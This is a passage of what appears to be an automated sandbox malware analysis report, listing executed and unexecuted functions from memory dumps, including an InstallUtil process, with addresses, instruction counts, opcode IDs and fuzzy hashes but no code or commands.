                                                  • Opcode Fuzzy Hash: 433438d492d39a0ea6de9e009abe22fedd7f627044eb3eb13199b836d208b93d
                                                  • Instruction Fuzzy Hash: 3A112671E116198BDB58CFABD9406AEFBF7AFC8310F14C07AE518A7214DB305A428F61
                                                  Function 09185098 Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4316d5004399806465a7fc1fbb6da9bf5666c03e5eeed8a63f4df93c90b69162
                                                  • Instruction ID: 2e762abc40b075f86ec6897b6e9688641f0b62e707c32debaefdf24f0629e0a5
                                                  • Opcode Fuzzy Hash: 4316d5004399806465a7fc1fbb6da9bf5666c03e5eeed8a63f4df93c90b69162
                                                  • Instruction Fuzzy Hash: ED1126B1E116199BDB58CFABD9406AEFBF7EFC8300F24C06AE408A7214DB305A018F51
                                                  Function 09184390 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 965836c94abba20fb050931f82b81f00ce7417f6af8b663a44c803f5e01434b6
                                                  • Instruction ID: 023be3a094374f2bfad5ccecdfd56b1fc6e3f9c0a17f0e4e0ffe53a5a1743434
                                                  • Opcode Fuzzy Hash: 965836c94abba20fb050931f82b81f00ce7417f6af8b663a44c803f5e01434b6
                                                  • Instruction Fuzzy Hash: 86113D71E116198BDB58CFAAD94169EFAF3AFC9300F14C07AE408B7264DB304A458F51
                                                  Function 091884F8 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 364e7f6ea8ee34e13a7cfcfcf23df2a3d8ef7071c7b9dac76f900eb8def36d0c
                                                  • Instruction ID: d53f1ac87d686c49b7c0445683743546d940ae10c809faa9a24981f6bf9a9089
                                                  • Opcode Fuzzy Hash: 364e7f6ea8ee34e13a7cfcfcf23df2a3d8ef7071c7b9dac76f900eb8def36d0c
                                                  • Instruction Fuzzy Hash: 50113AB1E116189BDB58CFABD8816AFFAF7AFC9200F14C07AD408B6254DB305A458F61

                                                  Executed Functions

                                                  Function 018425D4 Relevance: .5, Instructions: 513COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87115fbaa620b83a994a8cd73fc834b8a3abcdfa71354b82a84d97886b501507
                                                  • Instruction ID: 8d15a500cc3a08a565f997edd84e9a9eaeabb16258cde7cc49f6b8d54aa103b8
                                                  • Opcode Fuzzy Hash: 87115fbaa620b83a994a8cd73fc834b8a3abcdfa71354b82a84d97886b501507
                                                  • Instruction Fuzzy Hash: 68F0F6357083845FC7125779A81496ABFB6EFCF660B1540ABE409CB3B2C9350D46C7A6
                                                  Function 01841648 Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 646bb4d685d6f57b225882c9634176e3370a9da4a13cf36e7bcd5ed0d6b65da2
                                                  • Instruction ID: 076facef15fa4f25b02eb579d08aa9e3524a9ac2139ed1ca3b9835929a173821
                                                  • Opcode Fuzzy Hash: 646bb4d685d6f57b225882c9634176e3370a9da4a13cf36e7bcd5ed0d6b65da2
                                                  • Instruction Fuzzy Hash: A4414D34B002098FCB14DB69D5586AEBBF2BF88314F188169D41AAB355DF35AD82CB91
                                                  Function 01841658 Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8633bfb7d583739a0b0ccd196537c33ce8f8a622b0bc2d40a5ca0329bab6eb6d
                                                  • Instruction ID: 734c9c59692a860bc54834743ecf9287160840b0ea605f4457197e169a426422
                                                  • Opcode Fuzzy Hash: 8633bfb7d583739a0b0ccd196537c33ce8f8a622b0bc2d40a5ca0329bab6eb6d
                                                  • Instruction Fuzzy Hash: C5413B34B0020D8FCB14DB69C558AAEBBF2BB88314F248159D41AAB355DF35ED82CB91
                                                  Function 018408DD Relevance: .1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b245a94dbc35e7a6fbf75a21962411dd9516d9c91136e191228b2341a1cd300
                                                  • Instruction ID: 2bb0800a9c9e74319150aafbd0443a6c75b2f51f33e1dc3b488759c66554ab58
                                                  • Opcode Fuzzy Hash: 0b245a94dbc35e7a6fbf75a21962411dd9516d9c91136e191228b2341a1cd300
                                                  • Instruction Fuzzy Hash: DC21843470011DCBD708EB69C5546BF36A2BFC4708F104558E602EB3A1CF349E418BD6
                                                  Function 018408E6 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6e16d8f49fe9d3d10f74a91d491728e01ed4d15375a4d0e32cf1c1704d4cb5b
                                                  • Instruction ID: 4b4aa098d5a5951fc598b1c26eae25d52bbc77f0238106c80be69cc694a014b6
                                                  • Opcode Fuzzy Hash: d6e16d8f49fe9d3d10f74a91d491728e01ed4d15375a4d0e32cf1c1704d4cb5b
                                                  • Instruction Fuzzy Hash: 9D11513570021DCBDB18AB79C5646AF36A2AFC4708F104568E642EB3A5CE349E418BD6
                                                  Function 01841C90 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f1e3cc9f91075da51fbac423480b17523f51de7a491763950a012eaaf772f139
                                                  • Instruction ID: 3569cffa6c66b6d3e425a9710de1c16b05e5e5f1c2e37dbfd36f8a57bed5b9f2
                                                  • Opcode Fuzzy Hash: f1e3cc9f91075da51fbac423480b17523f51de7a491763950a012eaaf772f139
                                                  • Instruction Fuzzy Hash: E01188317083485FC7039B399C689AABFE6DFC221430481AED148CB342EE28ED428391
                                                  Function 018408F9 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 103261327cb055f476e14b05222cdc71e4f171a7b20f86696a78f280dff733ac
                                                  • Instruction ID: 7564551bbe4a9408b74b6d21e9600bca094ea2cd65e18895c4d258259322db93
                                                  • Opcode Fuzzy Hash: 103261327cb055f476e14b05222cdc71e4f171a7b20f86696a78f280dff733ac
                                                  • Instruction Fuzzy Hash: 0511513570011DCBDB48EB7985646AF76A3BFD4708F104568E642EB3A1CE349E418BD6
                                                  Function 018414F0 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc26ae3b7f8951e64280210b762cf4024304450fd1d694bc3bee75561aa3343e
                                                  • Instruction ID: 8b041ac36e46e9f4f2d61abea5ff37e0db335590bf6e636738484bc4bbddaef8
                                                  • Opcode Fuzzy Hash: bc26ae3b7f8951e64280210b762cf4024304450fd1d694bc3bee75561aa3343e
                                                  • Instruction Fuzzy Hash: 4501492151969A4FC302677C80640EEBFD1ED8232830A49ABC586CB157DF14EC8B87C6
                                                  Function 01840848 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d8981f0d81100d818609e724cbfdc4f6ecc7190f0a6b0c1a4e54e1a6d1e30df
                                                  • Instruction ID: 7427d82dfb5aff50aae9b43873cda7bdcfb8e5882012033f12221c34408400f0
                                                  • Opcode Fuzzy Hash: 7d8981f0d81100d818609e724cbfdc4f6ecc7190f0a6b0c1a4e54e1a6d1e30df
                                                  • Instruction Fuzzy Hash: E501713570021DCBEB54AB69C9687EF76B2AFC8304F104528E602EB391DF385D018BD2
                                                  Function 01841CC0 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b0d8f7ea21e39db2eaa8f70096f03aaec2042c0572398e596c18f3cc9283547
                                                  • Instruction ID: e71a4d77178c04bc00edefd81d9b398bce8a4c330848c6d58a6307d90f4f6ddc
                                                  • Opcode Fuzzy Hash: 0b0d8f7ea21e39db2eaa8f70096f03aaec2042c0572398e596c18f3cc9283547
                                                  • Instruction Fuzzy Hash: 82F0C8717002056BD715AB6EE854A6FB79AEBC4250340823DE619CB340EF74ED4687D0
                                                  Function 01841752 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1025d3a4920b94d68e144d6269bfb671664e6e5ce96eaf6a4cebd17d162369a9
                                                  • Instruction ID: 6c5bd0a0cff5de3d97b3cb0567ed18ff7245bd4d5064a421a5501bee8eb3bad2
                                                  • Opcode Fuzzy Hash: 1025d3a4920b94d68e144d6269bfb671664e6e5ce96eaf6a4cebd17d162369a9
                                                  • Instruction Fuzzy Hash: 6601AD3170010E8BCB01EB68D4845AEB3A3ABC8304B148519C51B9B354CF71ED828B82
                                                  Function 01840957 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 311c96ac0ba89ce158bd55dcfb38c71666b77ead3539aaa5bab2045b3b9d7fb1
                                                  • Instruction ID: faf07c34efb5e1980517bb936b6db4364e910cc554a2fc4edf7d8ace7e21b6e7
                                                  • Opcode Fuzzy Hash: 311c96ac0ba89ce158bd55dcfb38c71666b77ead3539aaa5bab2045b3b9d7fb1
                                                  • Instruction Fuzzy Hash: 1CF0863471011DCBDB449B69C9542AF3662BB84304F100518E601E7350CF344A019BD2
                                                  Function 018429F8 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d60a8c961a2c9bbd1113568f960cb10e046e547a839e62a77928847947440c08
                                                  • Instruction ID: 7f129f41c9fc803e3494e6324da028867304c3e572d26caa7e1e0d60d491254d
                                                  • Opcode Fuzzy Hash: d60a8c961a2c9bbd1113568f960cb10e046e547a839e62a77928847947440c08
                                                  • Instruction Fuzzy Hash: 7DE022353092985BC312626CA80462A7BAADBCA720B0500A6E908CB392CE251D0743E6
                                                  Function 018417E8 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60816233c9c5bffeccc7f325eb486fac5d8c09a0e95649b6f26a0a66d2c5632e
                                                  • Instruction ID: 97dd65f592978ff4df67223a2f807e24c5629730399128c8bb19e1887f727f88
                                                  • Opcode Fuzzy Hash: 60816233c9c5bffeccc7f325eb486fac5d8c09a0e95649b6f26a0a66d2c5632e
                                                  • Instruction Fuzzy Hash: A9E022323143581FCB02125DA808A7A3BAFEBC9610B0500B7F506C3382CE244D0683E2
                                                  Function 01841C50 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3537899751.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c3fc1625d71482fccefa070356892c57524c7857e8f6907760f57eea89a62ba
                                                  • Instruction ID: f71c6fcc92b6fe590a0ba33fd68aeadd73a20229748dc50672da5d9953361d19
                                                  • Opcode Fuzzy Hash: 0c3fc1625d71482fccefa070356892c57524c7857e8f6907760f57eea89a62ba
                                                  • Instruction Fuzzy Hash: 8AD05B7090410DEFCB40DFA4D94155EF7B5FB44200B5081ADE908D3300DB316F009780